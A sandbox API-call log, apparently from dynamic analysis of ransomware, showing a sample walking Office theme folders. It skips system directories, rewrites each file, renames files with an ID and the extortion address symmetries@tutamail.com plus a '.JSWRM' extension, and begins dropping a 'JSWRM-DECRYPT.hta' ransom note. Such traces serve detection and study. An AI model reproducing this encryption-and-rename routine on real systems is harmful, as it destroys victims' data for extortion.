lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.632] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=740) returned 1 [0100.633] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.633] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.658] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.658] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.658] CloseHandle (hObject=0x314) returned 1 [0100.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0100.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0100.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0100.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0100.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0100.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0100.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.659] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0100.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0100.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.660] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eb, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Yellow Orange.xml", cAlternateFileName="YELLOW~1.XML")) returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2=".") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="..") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="...") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="windows") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="recovery") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="perflogs") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="documents and settings") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="system volume information") returned 1 [0100.660] lstrcmpiW (lpString1="Yellow Orange.xml", lpString2="msocache") returned 1 [0100.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow Orange.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0100.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow Orange.xml", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yellow Orange.xml", lpUsedDefaultChar=0x0) returned 17 [0100.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow Orange.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow Orange.xml", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yellow Orange.xml", lpUsedDefaultChar=0x0) returned 17 [0100.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0100.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0100.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow Orange.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow orange.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.661] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=747) returned 1 [0100.662] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.662] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.663] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.663] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.663] CloseHandle (hObject=0x314) returned 1 [0100.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0100.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0100.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0100.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0100.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0100.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0100.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.664] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow Orange.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow orange.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow Orange.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow orange.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0100.665] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Yellow.xml", cAlternateFileName="")) returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2=".") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="..") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="...") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="windows") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="recovery") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="perflogs") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="documents and settings") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="system volume information") returned 1 [0100.665] lstrcmpiW (lpString1="Yellow.xml", lpString2="msocache") returned 1 [0100.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yellow.xml", lpUsedDefaultChar=0x0) returned 10 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0100.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellow.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yellow.xml", lpUsedDefaultChar=0x0) returned 10 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0100.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0100.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0100.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.666] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=740) returned 1 [0100.666] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.666] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.667] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.668] CloseHandle (hObject=0x314) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0100.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0100.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.668] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0100.669] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Yellow.xml", cAlternateFileName="")) returned 0 [0100.669] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0100.669] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Theme Effects", cAlternateFileName="THEMEE~1")) returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2=".") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="..") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="...") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="windows") returned -1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="recovery") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="perflogs") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="documents and settings") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="$RECYCLE.BIN") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="system volume information") returned 1 [0100.669] lstrcmpiW (lpString1="Theme Effects", lpString2="msocache") returned 1 [0100.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0100.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0100.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0100.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0100.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0100.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0100.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0100.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\jswrm-decrypt.hta")) returned 0xffffffff [0100.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0100.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0100.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0100.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0100.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0100.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0100.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0100.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0100.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0100.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 